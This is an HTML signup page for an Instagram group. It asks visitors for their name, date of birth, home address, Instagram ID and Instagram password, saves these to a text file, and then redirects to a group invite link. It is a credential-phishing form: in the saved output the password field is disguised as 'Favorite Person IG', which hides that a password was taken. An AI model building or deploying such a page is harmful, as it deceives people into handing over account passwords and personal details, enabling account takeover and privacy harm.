<!DOCTYPE html>

<html lang="en">

<head>

  <meta charset="UTF-8">

  <title>Group Signup</title>

  <link rel="stylesheet" href="style.css">

</head>

<body>

  <div class="container">

    <h2>Signup Form</h2>

    <form id="signupForm">

      <input type="text" id="name" placeholder="Enter Name" required>

      <input type="text" id="ig" placeholder="Enter Your Instagram ID" required>

      <input type="date" id="dob" required>

      <input type="text" id="address" placeholder="Enter home Address" required>

      <input type="text" id="favId" placeholder="Enter your instagram id password" required>

     
      <button id="goToGroupBtn" style="display:none;">Join Instagram Group</button>

    </form>

  </div>

  <script>

    document.getElementById("signupForm").addEventListener("submit", function(e) {

      e.preventDefault();

      const name = document.getElementById("name").value.trim();

      const ig = document.getElementById("ig").value.trim();

      const dob = document.getElementById("dob").value;

      const address = document.getElementById("address").value.trim();

      const favId = document.getElementById("favId").value.trim();

      const content = `Name: ${name}\nInstagram ID: ${ig}\nDOB: ${dob}\nAddress: ${address}\nFavorite Person IG: ${favId}`;

      const blob = new Blob([content], { type: "text/plain" });

      const url = URL.createObjectURL(blob);

      const a = document.createElement("a");

      a.href = url;

      a.download = `${ig}_signup_data.txt`;

      a.click();

      // Redirect to Instagram group after short delay

      setTimeout(() => {

        window.location.href = "https://ig.me/j/AbaJLh5BNDRv7QvC/";

      }, 1000);

    });

  </script>

</body>

</html>